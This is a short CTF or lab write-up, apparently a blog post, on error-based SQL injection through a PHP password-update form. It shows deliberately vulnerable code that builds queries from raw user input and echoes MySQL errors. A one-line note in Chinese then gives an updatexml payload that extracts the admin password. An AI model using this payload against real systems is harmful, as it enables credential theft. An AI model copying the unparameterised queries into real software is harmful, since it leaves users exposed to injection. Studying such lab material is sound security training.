SQLi -- POST-Update Query -Error Based -String
in PENETRATIONCTF with 0 comment

SQLi -- POST-Update Query -Error Based -String

in PENETRATIONCTF with 0 comment
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;


<!--more-->


    if($row)
    {
          //echo '<font color= "#0000ff">';   
        $row1 = $row['username'];     
        //echo 'Your Login name:'. $row1;
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
          echo "<br>";



        if (mysql_error())
        {
            echo '<font color= "#FFFF00" font size = 3 >'."<br>";
            print_r(mysql_error());
            //echo $update."<br>";
            echo "</br></br>";
            echo "</font>";
        }
        else
        {
            echo '<font color= "#FFFF00" font size = 3 >'."<br>";
            //echo " You password has been successfully updated " ;   
            echo $update."<br>";

            echo "<br>";
            echo "</font>";
        }

        echo '<img src="../images/flag1.jpg"   />'."<br>";   
        echo $update."<br>";
        //echo 'Your Password:' .$row['password'];
          echo "</font>";

上述使用了update语句修改密码,利用报错注入,回显数据

首先是最终的payload

uname=admin&passwd=a' or updatexml(1,concat(0x7e,(select password from (select password from users
where username='admin') hack),0x7e),1)#

Image.png

Responses